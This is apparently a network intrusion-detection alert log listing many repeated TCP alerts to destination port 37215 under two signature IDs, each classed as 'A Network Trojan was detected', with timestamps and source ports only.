          Timestamp:05/28/24-14:47:34.591238
          SID:2829579
          Source Port:38410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771748
          SID:2835222
          Source Port:59110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066252
          SID:2829579
          Source Port:44790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797817
          SID:2835222
          Source Port:50332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403350
          SID:2829579
          Source Port:60552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732174
          SID:2835222
          Source Port:34332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922804
          SID:2829579
          Source Port:41004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527944
          SID:2835222
          Source Port:34044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793913
          SID:2829579
          Source Port:42238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771762
          SID:2829579
          Source Port:56348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978860
          SID:2835222
          Source Port:37036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628807
          SID:2835222
          Source Port:34238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927819
          SID:2829579
          Source Port:59788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.700520
          SID:2835222
          Source Port:49124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778770
          SID:2829579
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191855
          SID:2829579
          Source Port:34028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739926
          SID:2835222
          Source Port:45124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152195
          SID:2835222
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958846
          SID:2829579
          Source Port:60156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401494
          SID:2835222
          Source Port:37376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437391
          SID:2835222
          Source Port:33408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806174
          SID:2829579
          Source Port:51224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299315
          SID:2835222
          Source Port:59968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767615
          SID:2835222
          Source Port:33970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717962
          SID:2835222
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329031
          SID:2829579
          Source Port:35676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961754
          SID:2835222
          Source Port:53744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196606
          SID:2835222
          Source Port:39856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551151
          SID:2829579
          Source Port:33924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485330
          SID:2835222
          Source Port:36674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332321
          SID:2835222
          Source Port:39336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735848
          SID:2829579
          Source Port:47962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.235777
          SID:2829579
          Source Port:45282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605916
          SID:2835222
          Source Port:60258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322181
          SID:2835222
          Source Port:46864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298281
          SID:2829579
          Source Port:36550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152772
          SID:2835222
          Source Port:52844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063880
          SID:2829579
          Source Port:36530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208527
          SID:2829579
          Source Port:39016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267433
          SID:2829579
          Source Port:33664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846275
          SID:2829579
          Source Port:39116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247061
          SID:2829579
          Source Port:53168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140303
          SID:2835222
          Source Port:40662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873608
          SID:2829579
          Source Port:48780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511210
          SID:2835222
          Source Port:46326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756390
          SID:2835222
          Source Port:47010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.067644
          SID:2829579
          Source Port:37798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485306
          SID:2829579
          Source Port:33408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438237
          SID:2835222
          Source Port:38102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.951954
          SID:2829579
          Source Port:58856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369137
          SID:2829579
          Source Port:46576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739703
          SID:2835222
          Source Port:55516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000696
          SID:2835222
          Source Port:48070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145187
          SID:2835222
          Source Port:41420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102812
          SID:2835222
          Source Port:33028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866652
          SID:2835222
          Source Port:56246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215866
          SID:2835222
          Source Port:48716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804633
          SID:2835222
          Source Port:48858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350274
          SID:2835222
          Source Port:59220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859665
          SID:2829579
          Source Port:38280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272880
          SID:2835222
          Source Port:45086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778459
          SID:2835222
          Source Port:58182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296401
          SID:2829579
          Source Port:59054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879129
          SID:2835222
          Source Port:59204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724676
          SID:2835222
          Source Port:34436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.320970
          SID:2829579
          Source Port:49320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594734
          SID:2835222
          Source Port:45556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860361
          SID:2829579
          Source Port:45500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152141
          SID:2835222
          Source Port:45158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651335
          SID:2829579
          Source Port:39722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959724
          SID:2829579
          Source Port:33852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152825
          SID:2829579
          Source Port:41968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597387
          SID:2829579
          Source Port:50524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044153
          SID:2829579
          Source Port:50066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301309
          SID:2829579
          Source Port:44814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077708
          SID:2829579
          Source Port:54604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659754
          SID:2835222
          Source Port:56084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125483
          SID:2835222
          Source Port:40826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.430156
          SID:2835222
          Source Port:42356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960743
          SID:2829579
          Source Port:46416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669440
          SID:2835222
          Source Port:40974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168454
          SID:2835222
          Source Port:33660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560905
          SID:2829579
          Source Port:35680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216369
          SID:2835222
          Source Port:37464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597632
          SID:2829579
          Source Port:34340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297376
          SID:2829579
          Source Port:60702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476636
          SID:2835222
          Source Port:39034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114392
          SID:2829579
          Source Port:36970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741679
          SID:2829579
          Source Port:41922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744242
          SID:2835222
          Source Port:34366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656269
          SID:2835222
          Source Port:41194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.419883
          SID:2835222
          Source Port:53922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.248160
          SID:2829579
          Source Port:48658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401294
          SID:2829579
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212661
          SID:2829579
          Source Port:38998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650603
          SID:2835222
          Source Port:57218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077611
          SID:2829579
          Source Port:37582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228254
          SID:2835222
          Source Port:34672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136926
          SID:2835222
          Source Port:47830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178453
          SID:2829579
          Source Port:39264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593332
          SID:2835222
          Source Port:37364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202726
          SID:2829579
          Source Port:40330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.288258
          SID:2835222
          Source Port:33410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062202
          SID:2829579
          Source Port:46326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671767
          SID:2835222
          Source Port:44676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269877
          SID:2835222
          Source Port:55404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931593
          SID:2835222
          Source Port:58690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922378
          SID:2835222
          Source Port:56262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.224685
          SID:2835222
          Source Port:57044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475761
          SID:2829579
          Source Port:48750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622292
          SID:2835222
          Source Port:56674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187241
          SID:2835222
          Source Port:34356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197301
          SID:2829579
          Source Port:56870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293720
          SID:2835222
          Source Port:46880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941549
          SID:2835222
          Source Port:50684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401585
          SID:2829579
          Source Port:55252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771845
          SID:2835222
          Source Port:53576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228799
          SID:2835222
          Source Port:39180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141604
          SID:2829579
          Source Port:50630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147496
          SID:2835222
          Source Port:51830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760132
          SID:2829579
          Source Port:52252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240501
          SID:2829579
          Source Port:47260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322079
          SID:2835222
          Source Port:40200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061836
          SID:2835222
          Source Port:49290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204556
          SID:2835222
          Source Port:42516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536820
          SID:2835222
          Source Port:47842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267112
          SID:2829579
          Source Port:45202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.888395
          SID:2829579
          Source Port:57052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493273
          SID:2829579
          Source Port:50930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296919
          SID:2829579
          Source Port:44124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483818
          SID:2829579
          Source Port:54394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668997
          SID:2829579
          Source Port:36170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530177
          SID:2829579
          Source Port:46362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147307
          SID:2835222
          Source Port:53456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338011
          SID:2829579
          Source Port:38288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622210
          SID:2835222
          Source Port:60964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269720
          SID:2829579
          Source Port:41498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.853273
          SID:2829579
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708318
          SID:2829579
          Source Port:54628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298784
          SID:2835222
          Source Port:35892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267084
          SID:2829579
          Source Port:37662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462908
          SID:2835222
          Source Port:43046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214443
          SID:2835222
          Source Port:34994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591343
          SID:2829579
          Source Port:41666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273196
          SID:2829579
          Source Port:43584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742236
          SID:2829579
          Source Port:41326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804722
          SID:2829579
          Source Port:42808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216362
          SID:2829579
          Source Port:40274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135983
          SID:2835222
          Source Port:46418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.340941
          SID:2829579
          Source Port:36910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321044
          SID:2835222
          Source Port:60508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.687362
          SID:2829579
          Source Port:56732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328108
          SID:2829579
          Source Port:47134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921119
          SID:2835222
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735515
          SID:2835222
          Source Port:54064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594295
          SID:2829579
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177301
          SID:2829579
          Source Port:39434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631728
          SID:2829579
          Source Port:43626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669468
          SID:2835222
          Source Port:39980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782817
          SID:2835222
          Source Port:59878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285895
          SID:2829579
          Source Port:45536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045929
          SID:2835222
          Source Port:44976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.731111
          SID:2835222
          Source Port:54018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711352
          SID:2829579
          Source Port:37744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497628
          SID:2829579
          Source Port:56446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298799
          SID:2835222
          Source Port:37856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938160
          SID:2829579
          Source Port:46316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953836
          SID:2835222
          Source Port:41388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.091585
          SID:2835222
          Source Port:35792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214129
          SID:2835222
          Source Port:44904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276389
          SID:2829579
          Source Port:47820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794238
          SID:2835222
          Source Port:36392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267828
          SID:2835222
          Source Port:56794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476222
          SID:2835222
          Source Port:39120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594713
          SID:2829579
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178394
          SID:2829579
          Source Port:41166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.913673
          SID:2835222
          Source Port:36746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963992
          SID:2835222
          Source Port:39980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045295
          SID:2835222
          Source Port:33674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932150
          SID:2835222
          Source Port:43558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326804
          SID:2829579
          Source Port:38168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266197
          SID:2829579
          Source Port:34700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473556
          SID:2829579
          Source Port:59152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462229
          SID:2835222
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225959
          SID:2829579
          Source Port:38126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.242581
          SID:2835222
          Source Port:60628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551064
          SID:2829579
          Source Port:37852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230021
          SID:2829579
          Source Port:47222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613870
          SID:2835222
          Source Port:60556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796484
          SID:2829579
          Source Port:47564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528142
          SID:2835222
          Source Port:55876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796206
          SID:2829579
          Source Port:46442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269161
          SID:2835222
          Source Port:36918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.478122
          SID:2829579
          Source Port:37424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142070
          SID:2835222
          Source Port:48322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922632
          SID:2835222
          Source Port:56368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178553
          SID:2829579
          Source Port:35218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598905
